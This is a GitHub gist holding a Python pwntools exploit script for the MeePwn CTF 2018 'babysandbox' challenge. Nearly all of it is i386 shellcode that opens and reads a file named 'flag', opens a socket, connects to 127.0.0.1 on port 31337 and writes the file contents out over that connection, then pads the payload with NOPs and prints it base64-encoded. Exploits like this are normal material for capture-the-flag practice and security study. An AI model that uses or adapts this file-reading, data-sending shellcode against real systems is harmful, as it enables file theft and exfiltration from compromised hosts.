Skip to content

Instantly share code, notes, and snippets.

@hama7230

hama7230/exploit.py

Created Jul 15, 2018
Embed
What would you like to do?
MeePwn CTF 2018 Quals babysandbox
#!/usr/bin/env python
from pwn import *
context(os='linux', arch='i386')
shellcode = '''
// openat
xor eax, eax
push eax
push 0x67616c66
mov ebx, -100
mov ecx, esp
xor edx, edx
xor esi, esi
mov ax, 0x127
int 0x80
// readv
mov ebx, eax
mov ax, 0x100
push eax
mov ecx, esp
inc ecx
inc ecx
inc ecx
inc ecx
push ecx
mov ecx, esp
xor edx, edx
inc edx
xor eax, eax
mov al, 0x91
int 0x80
// socket(2, 1, 6);
xor eax, eax
xor ebx, ebx
xor ecx, ecx
push ecx
mov cl, 6
push ecx
mov cl, 1
push ecx
mov cl, 2
push ecx
mov ecx, esp
mov bl, 1
mov al, 102
int 0x80
//connect(sock, sockaddr, 16)
mov edx, eax
xor eax, eax
xor ecx, ecx
push ecx
push ecx
push 0x0100007f // 127.0.0.1
pushw 0x697a // 31337
mov cl, 2
pushw cx
mov edi, esp
mov bl, 16
push ebx
push edi
push edx
mov ecx, esp
mov bl, 3
mov al, 102
int 0x80
// writev
mov ebx, edx
lea ecx, [esp+0x2c]
xor eax, eax
mov dl, 1
mov al, 0x92
int 0x80
'''
payload = asm(shellcode)
payload = payload.ljust(0x100, '\x90')
print payload.encode('base64')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.